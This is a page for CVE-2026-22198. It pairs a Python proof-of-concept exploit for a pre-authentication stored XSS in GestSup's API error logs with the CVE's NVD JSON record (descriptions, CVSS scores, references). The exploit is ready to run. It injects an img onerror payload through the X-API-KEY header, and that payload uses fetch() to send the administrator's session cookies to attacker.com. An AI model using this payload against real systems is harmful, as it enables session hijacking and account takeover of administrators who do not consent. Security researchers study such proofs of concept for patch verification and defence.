CVE-2026-22198

import requests import urllib.parse # CVE-2026-22198 PoC - GestSup Stored XSS in API Error Logs # Target: GestSup < 3.2.60 # Attack Vector: Malicious X-API-KEY header in API request TARGET_URL = "http://target-server/api/v1/ticket.php" # XSS payload - steals admin session cookies xss_payload = '<img src=x onerror="fetch(`https://attacker.com/log?c=`+document.cookie)">' def exploit_stored_xss(): """Send malicious X-API-KEY header to inject XSS into logs""" headers = { 'X-API-KEY': xss_payload, 'Content-Type': 'application/json' } # Trigger error log by sending invalid request data = { 'action': 'create', 'invalid_param': 'test' } try: response = requests.post(TARGET_URL, json=data, headers=headers, timeout=10) print(f"[*] Request sent to {TARGET_URL}") print(f"[*] Payload: {xss_payload}") print(f"[*] Status: {response.status_code}") if response.status_code in [400, 401, 500]: print("[+] XSS payload likely logged - requires admin to view logs") print("[+] When admin views logs at /index.php?page=logs, XSS will execute") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": print("="*60) print("CVE-2026-22198 GestSup Stored XSS PoC") print("="*60) exploit_stored_xss()

{"cve": {"id": "CVE-2026-22198", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:55.310", "lastModified": "2026-01-14T19:43:12.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GestSup versions prior to 3.2.60 contain a pre-authentication stored cross-site scripting (XSS) vulnerability in the API error logging functionality. By sending an API request with a crafted X-API-KEY header value (for example, to /api/v1/ticket.php), an unauthenticated attacker can cause attacker-controlled HTML/JavaScript to be written to log entries. When an administrator later views the affected logs in the web interface, the injected content is rendered without proper output encoding, resulting in arbitrary script execution in the administrator’s browser session."}, {"lang": "es", "value": "Las versiones de GestSup anteriores a la 3.2.60 contienen una vulnerabilidad de cross-site scripting (XSS) almacenado de preautenticación en la funcionalidad de registro de errores de la API. Al enviar una solicitud de API con un valor de encabezado X-API-KEY manipulado (por ejemplo, a /api/v1/ticket.php), un atacante no autenticado puede hacer que HTML/JavaScript controlado por el atacante se escriba en las entradas de registro. Cuando un administrador ve posteriormente los registros afectados en la interfaz web, el contenido inyectado se renderiza sin una codificación de salida adecuada, lo que resulta en la ejecución arbitraria de scripts en la sesión del navegador del administrador."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.56", "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"}]}]}], "references": [{"url": "https://gestsup.fr/index.php?page=changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/gestsup-stored-xss-in-api-error-logs", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}